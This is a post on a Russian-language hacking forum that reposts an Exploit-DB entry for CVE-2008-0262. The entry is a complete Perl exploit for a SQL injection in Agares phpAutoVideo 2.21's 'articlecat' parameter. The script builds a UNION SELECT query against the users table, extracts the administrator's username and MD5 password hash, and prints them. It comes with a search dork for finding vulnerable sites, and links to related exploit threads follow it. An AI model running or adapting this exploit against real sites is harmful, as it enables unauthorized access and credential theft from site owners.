Exploit Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4905
Проверка EDB
  1. Пройдено
Автор
PR0METHEUS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0262
Дата публикации
2008-01-13
Код: 
#!/usr/bin/perl
#Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit
#Bug Found by ka0x ( http://milw0rm.org/exploits/4901 ).. but sql injection works if we include in index.php bug file with sql injection..like this :
#http://192.168.1.102/video/UPLOAD/index.php?loadpage=./includes/articleblock.php&articlecat=[SQL]
#So.. we can execute sql query and we have user admin & pass in MD5
#Exploit by Pr0metheus
#Gr33tz to Gr33tz-Team.org
#Dork : "powered by AMCMS3"
###############################################
use LWP::UserAgent;
if(@ARGV!=3){
	print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
	print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n";
	print "perl $0 <site> <path> <prefix>\n";
    print "default prefix - amcms\n";
	print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
}
($site,$path,$prefix)=@ARGV;
$file  = "index.php?loadpage=./includes/articleblock.php&articlecat=";
$query = "1+and+1=2+UNION+SELECT+userkey,username,password,4,5,6,7,8,9,10+from+".$prefix."_users+where+userkey=1/*";
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "".$site."".$path."".$file."".$query."");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
if($con =~ /<p>(.*)<\/p>/){
	$p = $1;
	print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
	print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
	print "[+] Admin Pass : ".$p."\n";
	
	if($con =~/">(.*)<\/a><\/h1>/){
		$u = $1;
		print "[+] Admin Username : ".$u."\n";
		print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
	
	}
	else{
		print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
		print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
		print "[+] Exploit Failed...\n";
		print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
	}
}
else{
	print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
	print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
	print "[+] Exploit Failed...\n";
	print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
}

# milw0rm.com [2008-01-13]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)
Ответы
0
Просмотры
231
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Agares phpAutoVideo 2.21 - Local/Remote File Inclusion
Ответы
0
Просмотры
225
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion
Ответы
0
Просмотры
302
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion
Ответы
0
Просмотры
266
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAutoVideo 2.21 - 'index.php?cat' Cross-Site Scripting
Ответы
0
Просмотры
251
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpAutoVideo 2.21 - 'sidebar.php?loadpage' Remote File Inclusion
Ответы
0
Просмотры
252
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Arcadem Pro - 'articlecat' SQL Injection
Ответы
0
Просмотры
270
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу